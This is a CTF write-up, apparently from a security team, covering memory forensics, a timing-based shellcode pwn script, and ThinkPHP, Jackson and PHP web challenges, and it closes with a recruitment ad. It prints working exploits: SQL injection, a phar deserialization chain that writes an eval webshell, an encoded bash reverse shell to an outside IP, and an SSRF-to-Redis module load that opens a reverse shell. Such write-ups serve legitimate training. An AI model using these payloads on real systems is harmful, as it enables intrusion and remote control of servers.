Misc
Sign in
Group announcement
FLAG
flag{e7gRR32wJJcHwQjwc2k9qFZ6fvn3gZ8P}
Browser
First get
1. Default browser (please provide the corresponding value in the registry that can prove that it is the default browser, such as IE.HTTP)
Generally in the registry, patiently turn over
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist ./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist -o 0x8f484880
http://www.360doc.com/content/14/0216/23/13813789_353089973.shtml
See the address appended to the registry
Then search the registry of win7
"Software\Microsoft\windows\Shell\Associations\UrlAssociations\http\Userchoice"
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 dumpfiles -Q 0x000000007da2abf0 -D ./
Download and import navicat
In descending order, and then you can see
https://weibo.com/login.php
Splicing
MSEdgeHTM_92.0.902.78_https://weibo.com/login.php
Get flag
Pwn
ezshell
from pwn import *
elf=ELF('./chall')
EXCV = context.binary = './chall'
context.arch='amd64'
def pwn(p, idx, c):
# open
shellcode = '''
push 0x3a; pop rdi; xor rbx,rbx;inc bl;shl rbx,0x10;add rdi,rbx; xor
esi, esi;
open:
push 2; pop rax; syscall;
cmp al,0x4
jl open
'''
# re open, rax => 0x14
# read(rax, 0x10050, 0x50)
shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x50;
pop rsi;add rsi,rbx; syscall;"
# cmp and jz
if idx == 0:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx,
c)
else:
shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx,
c)
shellcode = asm(shellcode)
p.recvuntil('======== Input your secret code ========\n')
p.send(shellcode.ljust(0x40-6, b'a') + b'./flag')
idx = 0
var_list = []
while(1):
for c in range(32, 127):
p = remote("47.104.169.149",25178)
# p=process('./chall')
pwn(p, idx, c)
start = time.time()
try:
p.recv(timeout=2)
except:
pass
end = time.time()
p.close()
if end-start > 1.5:
var_list.append(c)
print("".join([chr(i) for i in var_list]))
break
else:
print("".join([chr(i) for i in var_list]))
break
idx = idx + 1
print("".join([chr(i) for i in var_list]))
Web
eztp
www.zip source code disclosure
POST /public/ HTTP/1.1 Host: 8.134.37.86:26846 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 100 Origin: http://8.134.37.86:26846 Connection: close Referer: http://8.134.37.86:26846/public/index.php Cookie: PHPSESSID=7la556p4v160a8j1nhcholth1d username[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=) union select 1,1#&password=1
Inject login into the background
POP chain
<?php
namespace think {
abstract class Model
{
protected $append;
protected $error;
public $parent;
}
}
namespace think\model {
use think\db\Query;
use think\Model;
use think\model\relation\HasOne;
use think\console\Output;
abstract class Relation
{
protected $query;
protected $selfRelation;
protected $parent;
protected $foreignKey;
protected $localKey;
}
class Pivot extends Model
{
public function __construct()
{
$this->append = ['mb' => 'getError'];
$this->error = new HasOne();
$this->parent = new Output();
}
}
}
namespace think\session\driver {
use think\cache\driver\File;
class Memcached
{
protected $handler;
public function __construct()
{
$this->handler = new File();
}
}
}
namespace think\cache\driver {
class File
{
protected $options;
protected $tag;
function __construct()
{
$this->options = [
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-
decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../../../../../
../../../var/www/html/public/uploads/a.php',
'data_compress' => false,
];
$this->tag = 1;
}
}
}
namespace think\db {
use think\console\Output;
class Query
{
protected $model;
public function __construct()
{
$this->model = new Output();
}
}
}
namespace think\console {
use think\session\driver\Memcached;
class Output
{
protected $styles;
private $handle;
public function __construct()
{
$this->styles = ['where'];
$this->handle = new Memcached();
}
}
}
namespace think\model\relation {
use think\Model\Relation;
use think\db\Query;
use think\console\Output;
abstract class OneToOne extends Relation
{
protected $bindAttr;
}
class HasOne extends OneToOne
{
public function __construct()
{
$this->selfRelation = 0;
$this->query = new Output();
$this->bindAttr = ['ccc', 'ccc'];
$this->foreignKey = 'ccc';
$o = new \stdClass();
$o->mb = 'ccc';
$this->parent = $o;
$this->localKey = 'mb';
}
}
}
namespace think\process\pipes {
use think\model\Pivot;
class Windows
{
private $files;
public function __construct()
{
$this->files = [new Pivot()];
}
}
}
namespace {
use think\process\pipes\Windows;
// echo urlencode(base64_encode(serialize(new Windows())));
$phar = new Phar("exp.phar"); //Suffix must be phar
$phar->startBuffering();
$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
$object = new Windows();
$phar->setMetadata($object); //Save the customized meta data into the manifest
$phar->addFromString("1.php", ""); //Add files to compress
//Automatic signature calculation
$phar->stopBuffering();
rename("exp.phar", "exp.jpg");
}
Upload phar file
Trigger phar deserialization using listpic routing
http://8.134.37.86:24954/public/? s=admin/index/listpic&dir=phar:///var/www/html/public/static/img/person.jpg
Read flag after writing to shell
jackson
Peanut shell setting intranet penetration arrangement malicious ldap service
use exploit LDAPLocalChainListener
use payload CommonsCollections8
use bullet TransformerBullet
set lport 9001
set version 3
set args 'set args 'bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzIuMjAxLjQ0Lzk5OTkgMD4mMQ==}|{base64,-
d}|{bash,-i}''
run
ysomap directly uses the payload above
Transfer to the server and connect to the shell
easy_eval
Deserialization
<?php
class a{
public $code = "system('cat /*;id');";
function __construct($code)
{
$this->code = $code;
}
}
class b{
function __construct($code)
{
$this->a = new a($code);
}
function __destruct(){
echo $this->a->a();
}
}
$c = new b('eval($_REQUEST[0]);');
echo serialize($c);
Upload the so extension of redis to the / tmp directory
Start ssrf with fsockopen and call redis
<?php
function Getfile($host, $port, $link){
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if(!$fp){
echo "$errstr (error number $errno) \n";
}else{
$out = "$link";
//$out = "GET $link HTTP/1.1\r\n";
//$out .= "HOST $host \r\n";
//$out .= "Connection: Close\r\n\r\n";
//$out .= "\r\n";
fwrite($fp, $out);
$content = '';
while(!feof($fp)){
$contents .= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
$poc = "AUTH you_cannot_guess_it\r\n";
$poc .= "module load /tmp/exp.so\r\nsystem.rev 121.196.165.115 6663\r\n";
$poc .= "info\r\nquit\r\n";
var_dump($poc);
var_dump(Getfile("127.0.0.1","6379",$poc));
Tip
Do you want to join a security team
Have a better learning atmosphere?
Then join EDI security. The threshold here is not very high, but the masters are experienced and can take you from the foundation, as long as you have the determination to make persistent efforts.
EDI safe CTF team often participates in major CTF competitions and understands CTF competitions. We are working hard to create a good technical atmosphere in the safety circle. This is definitely a good place for you to learn technology. The threshold here is not very high, but the masters are experienced and can start with you from the foundation. As long as you have the determination to make persistent efforts, the next CTF bull is you.
Welcome to Xiaobai. Let's play CTF together and make progress together.
We're digging. We won't let you bury it!
Your joining can bring us new vitality, and we can also give you unlimited development space.
If you are interested, please contact the email root@edisec.net (bring your resume, including your learning direction, learning experience, etc.)